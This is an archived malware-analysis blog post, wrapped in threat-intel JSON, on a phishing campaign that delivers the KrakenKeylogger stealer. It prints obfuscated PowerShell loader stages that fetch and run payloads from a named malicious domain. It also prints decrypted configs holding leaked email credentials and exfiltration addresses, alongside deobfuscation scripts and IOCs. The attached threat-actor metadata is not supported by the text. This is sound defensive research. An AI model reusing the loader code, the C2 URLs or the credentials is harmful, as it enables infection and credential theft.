{ "id": "a3b6653d-6cba-42cb-a1e0-aec26cac4dec", "created_at": "2026-04-06T00:22:22.336842Z", "updated_at": "2026-04-10T03:36:47.655087Z", "deleted_at": null, "sha1_hash": "66682c2bb3e5591d136892d1ccd69dc032f8fb2c", "title": "Kraken - The Deep Sea Lurker Part 1", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 10071324, "plain_text": "Kraken - The Deep Sea Lurker Part 1\r\nBy 0xToxin\r\nPublished: 2023-05-20 · Archived: 2026-04-05 15:58:46 UTC\r\nIntroPermalink\r\nIn this first part we will be going through a recent phishing campaign delivering a never seen before\r\n“KrakenKeylogger” malware.\r\nThe PhishPermalink\r\nThe mail sent to the victim is a simple malspam mail with archive attachment:\r\nhttps://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\r\nPage 1 of 15\n\nThe archive is a .zip archive that contains .lnk file:\r\nLNK AnalysisPermalink\r\nhttps://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\r\nPage 2 of 15\n\nIn order to analyze an .lnk file I use the LeCMD tool. By using the tool we can see that the .lnk will execute\r\nPowerShell.exe alongside with an argument:\r\nPowerShell ScriptPermalink\r\nLet’s breakdown the script:\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -ExecutionPolicy UnRestricted $ProgressPreference =\r\nfunction nvRClWiAJT($OnUPXhNfGyEh){\r\n $OnUPXhNfGyEh[$OnUPXhNfGyEh.Length..0] -join('')\r\n};\r\nfunction sDjLksFILdkrdR($OnUPXhNfGyEh){\r\n $vecsWHuXBHu = nvRClWiAJT $OnUPXhNfGyEh;\r\n for($TJuYrHOorcZu = 0;$TJuYrHOorcZu -lt $vecsWHuXBHu.Length;$TJuYrHOorcZu += 2){\r\n try{\r\n $zRavFAQNJqOVxb += nvRClWiAJT $vecsWHuXBHu.Substring($TJuYrHOorcZu,2)\r\n }\r\n catch{\r\n $zRavFAQNJqOVxb += $vecsWHuXBHu.Substring($TJuYrHOorcZu,1)\r\n }\r\n };\r\n $zRavFAQNJqOVxb\r\n};\r\n$NpzibtULgyi = sDjLksFILdkrdR 'aht1.sen/hi/coucys.erstmaofershma//s:tpht';\r\n$cDkdhkGBtl = $env:APPDATA + '\\' + ($NpzibtULgyi -split '/')[-1];\r\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;\r\n$wbpiCTsGYi = wget $NpzibtULgyi -UseBasicParsing;\r\n[IO.File]::WriteAllText($cDkdhkGBtl, $wbpiCTsGYi); \u0026 $cDkdhkGBtl;\r\nsleep 3;\r\nrm $cDkdhkGBtl;\r\nhttps://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\r\nPage 3 of 15\n\nThe script will create a new string which will be the URL to the next payload, the script will take the obfuscated\r\nURL string and will deobfuscate it in several steps:\r\n1. The string will be reversed by the function nvRClWiAJT .\r\n2. a for loop will iterate through the flipped string and will jump every 2 chars.\r\n3. each iteration 2 chars will be flipped again, and in the last iteration the last char will flipped also but it\r\nwon’t have any effect.\r\nHere is a quick python script that does this process:\r\ninput_string = 'aht1.sen/hi/coucys.erstmaofershma//s:tpht'[::-1]\r\noutput_string = ''\r\nfor i in range(0, len(input_string), 2):\r\n try:\r\n tmp = input_string[i] + input_string[i + 1]\r\n output_string += tmp[::-1]\r\n except:\r\n output_string += input_string[i]\r\nprint(output_string)\r\nhttps://masherofmasters.cyou/chin/se1.hta\r\nse1.htaPermalink\r\nThe fetched payload will be yet another powershell script:\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -ExecutionPolicy UnRestricted\r\nfunction WQgtWbWK($FL, $i){\r\n [IO.File]::WriteAllBytes($FL, $i)\r\n};\r\nfunction APcZNMgjQ($FL){\r\n if($FL.EndsWith((QXUpF @(4995,5049,5057,5057))) -eq $True){\r\n Start-Process (QXUpF @(5063,5066,5059,5049,5057,5057,5000,4999,4995,5050,5069,5050)) $FL\r\n }else{\r\n Start-Process $FL\r\n }\r\n};\r\nfunction laiLJMT($eh){\r\n $LM = New-Object (QXUpF @(5027,5050,5065,4995,5036,5050,5047,5016,5057,5054,5050,5059,5065));\r\n [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;\r\nhttps://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\r\nPage 4 of 15\n\n$i = $LM.DownloadData($eh);\r\n return $i\r\n};\r\nfunction QXUpF($P){\r\n $n=4949;\r\n $s=$Null;\r\n foreach($WK in $P){\r\n $s+=[char]($WK-$n)\r\n };\r\n return $s\r\n};\r\nfunction deaNPih(){\r\n $AVYABiApT = $env:APPDATA + '\\';\r\n $XdOFJCmMx = laiLJMT (QXUpF @(5053,5065,5065,5061,5064,5007,4996,4996,5058,5046,5064,5053,5050,5063,5060,505\r\n $qNfQDXYlR = $AVYABiApT + 'se1.exe';\r\n WQgtWbWK $qNfQDXYlR $XdOFJCmMx;\r\n APcZNMgjQ $qNfQDXYlR;;;;\r\n}\r\ndeaNPih;\r\nThe script has several obfuscated strings that are being deobfuscated using the function QXUpF by simply going\r\nover each number and substracting 4949 from it. here is a quick script that will deobfuscate those strings and\r\nprint the clear strings:\r\nstringsList = [[4995,5049,5057,5057],[5063,5066,5059,5049,5057,5057,5000,4999,4995,5050,5069,5050],[5027,5050,5\r\nfor string in stringsList:\r\n tmp = ''\r\n for char in string:\r\n tmp += chr(char - 4949)\r\n print(f'[+] - {tmp}')\r\n[+] - .dll\r\n[+] - rundll32.exe\r\n[+] - Net.WebClient\r\n[+] - https://masherofmasters.cyou/chin/se1.exe\r\nThe script will download another file from the same domain previously used for fetching the .hta file in the\r\nprevious powershell script.\r\n.NET LoaderPermalink\r\nhttps://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\r\nPage 5 of 15\n\nStage 1Permalink\r\nthe fetched executable ( se1.exe ) is a .NET executable:\r\nthe loader will decrypt embedded resource DataBasePracticalJob using the encryption algorithim RC2 , the key\r\nfor the encryption will be the MD5 hash value of the hardcoded string QEssDJZhQnLywDnJGpBEr (The interesting\r\npart here is that the hashing applied on the string after encoding it with BigEndianUnicode , 0x00 appends as a\r\nsuffix to each byte.) Here is a diagram of the decryption process:\r\nyou can use this CyberChef Recipe in order to calculate the MD5 hash easily. Then using RC2 decryption in\r\nCyberChef we can also fetch the 2nd stage:\r\nhttps://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\r\nPage 6 of 15\n\nStage 2Permalink\r\nThe second stage is a .NET DLL which will be invoked by the first stage executable.\r\nThe DLL will be invoke on its first public exported method which is syncfusion :\r\nThe second strange DLL will have 2 embedded resources that will be decrypted, the first embedded resource\r\nSeaCyanPul will be a .DLL that will be in charge of injecting the final payload to RegAsm.exe (won’t be\r\ngetting into it right now but the 3rd stage will be uploaded to Malware Bazaar)\r\nThe second resource UnknownDetails will be our final payload which will be decrypted using a simple AES-ECB\r\nencryption routine without IV, the key in this case will be a sha256 of null value:\r\nhttps://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\r\nPage 7 of 15\n\nAs I wrote before that, the payload will injected to RegAsm.exe\r\nKraken PayloadPermalink\r\nThe Kraken payload 32-bit .NET binary, so we can work with DnSpy to go over some of it functionalities.\r\nKraken ConfigsPermalink\r\nThe configs of the Kraken stored in the .cctor of the main class:\r\nSome of the configs are encrypted using DES-EBC encryption routine without IV, the key is MD5 hash of a\r\npreconfigured string, in this case: swCpiTiAhkkEpyDZTnAGhOBZpr , here is a quick python script that will decrypt\r\nthe config strings for us:\r\nimport malduck, base64\r\nfrom Crypto.Cipher import DES\r\nencryptedStringsDict = {\r\n 'PersonalEmail': 'KYlYJirrzmj9NFMzqVxdqqmBPWvogKC9',\r\n 'PersonalEmailPassword': 'lNI13bp6TxER2sT4YYxfjw==',\r\n 'PersonalEmailHost': '6pvSg6TWhxedDZq2k3/l06fwica30Jlg',\r\n 'TheSMTPReciver': 'qUQWGy6wVRm4PKDty97tnE+Z3alydqyP',\r\n 'PersonalEmailPort': 'VqONpyzLqFY=',\r\n 'PersonalHostLink': 'EdrE+GGMX48=',\r\n 'PersonalHostPassword': 'EdrE+GGMX48=',\r\n 'PersonalHostUsername': 'EdrE+GGMX48=',\r\nhttps://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\r\nPage 8 of 15\n\n'TheTelegramToken': 'EdrE+GGMX48=',\r\n 'PersonalTeleID': 'EdrE+GGMX48='\r\n}\r\nmd5hashKey = malduck.md5(b'swCpiTiAhkkEpyDZTnAGhOBZpr')[:8]\r\nfor k,v in encryptedStringsDict.items():\r\n des = DES.new(md5hashKey, DES.MODE_ECB)\r\n decVal = des.decrypt(base64.b64decode(v))\r\n print(f'[+] {k} - {decVal.decode()}')\r\n[+] PersonalEmail - onuma.b@thereccorp.com\r\n[+] PersonalEmailPassword - O@1234\r\n[+] PersonalEmailHost - mail.thereccorp.com\r\n[+] TheSMTPReciver - jbs.hannong@gmail.com\r\n[+] PersonalEmailPort - 587\r\n[+] PersonalHostLink\r\n[+] PersonalHostPassword\r\n[+] PersonalHostUsername\r\n[+] TheTelegramToken\r\n[+] PersonalTeleID\r\nSo now we have the configuration of the Kraken, let’s move to some capabilities overview:\r\nCustom CommandsPermalink\r\nThe Kraken has several functions that can be executed (only if the user of the malware flag them during the\r\ncompilation process of the stub), such as:\r\nTimeToRun\r\nLoadWeb\r\nDisable_Task\r\nDisable_CommandPrompt\r\nDisable_Regis\r\nProcessKiller\r\nhttps://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\r\nPage 9 of 15\n\nNothing really interesting here, probably some persistence methods/VM checks.\r\nHarvesting CapabilitiesPermalink\r\nThe kraken follows the usual info stealer path as stealing local Outlook, Foxmail, ThunderBird mails credentials.\r\nIt will lookup for credentials in those browsers:\r\nGoogle Chrome\r\nQQ Browser\r\nVivaldi Browser\r\nChromium Browser\r\nCent Browser\r\nChedot Browser\r\n360Browser\r\nhttps://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\r\nPage 10 of 15\n\nBrave\r\nTorch\r\nUC Browser\r\nBlisk\r\nOpera\r\nAvast Browser\r\nEdge\r\nGoogle Chrome Canary\r\nFirefox\r\nCocCoc\r\nCitrio Browser\r\nCoolNovo\r\nEpic Privacy Browser\r\nThe Kraken will also look for FileZilla Credentials\r\nhttps://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\r\nPage 11 of 15\n\nExfiltrationPermalink\r\nThe Kraken allows exfiltration via:\r\nFTP\r\nSMTP\r\nhttps://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\r\nPage 12 of 15\n\nTelegram Bot\r\nFTPPermalink\r\nSMTPPermalink\r\nTelegram BotPermalink\r\nhttps://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\r\nPage 13 of 15\n\nPost Exfiltration ActionsPermalink\r\nAfter the stealing process was done, the Kraken will automatically start a keylogging process + screenshot\r\ncapturing of the victim’s computer:\r\nIOC’sPermalink\r\nDoc signed Subcontract Agreement.zip -\r\n79571f0ad832a31a1121f7c698496de7e4700271ccf0a7ed7fe817688528a953\r\nseedof.lnk - beec3ec08fba224c161464ebcc64727912c6678dd452596440809ce99c8390fd\r\nhttps://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\r\nPage 14 of 15\n\n1st.exe - dddaf7dfb95c12acaae7de2673becf94fb9cfa7c2d83413db1ab52a5d9108b79\r\n2nd.dll - f7c66ce4c357c3a7c44dda121f8bb6a62bb3e0bc6f481619b7b5ad83855d628b\r\n3rd.dll - 43e79df88e86f344180041d4a4c9381cc69a8ddb46315afd5c4c3ad9e6268e17\r\nKraken.exe - ee76fec4bc7ec334cc6323ad156ea961e27b75eaa7efb4e88212b81e65673000\r\nSummaryPermalink\r\nIn this blog I’ve covered a new .NET based stealer/keylogger malware, the way it was used in a phishing\r\ncampaign, and a dive into the loader/injection process including overview of the malware capabilities and config\r\nextraction.\r\nPart 2Permalink\r\nIn part 2 I will be explaining my Threat hunting process, why the malware being flagged falsely? and how I\r\nmanaged to find more samples that helped me confirm my findings.\r\nPart 2 is up! check it out right here\r\nSource: https://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\r\nhttps://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/" ], "report_names": [ "KrakenKeylogger-pt1" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434942, "ts_updated_at": 1775792207, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/66682c2bb3e5591d136892d1ccd69dc032f8fb2c.pdf", "text": "https://archive.orkl.eu/66682c2bb3e5591d136892d1ccd69dc032f8fb2c.txt", "img": "https://archive.orkl.eu/66682c2bb3e5591d136892d1ccd69dc032f8fb2c.jpg" } }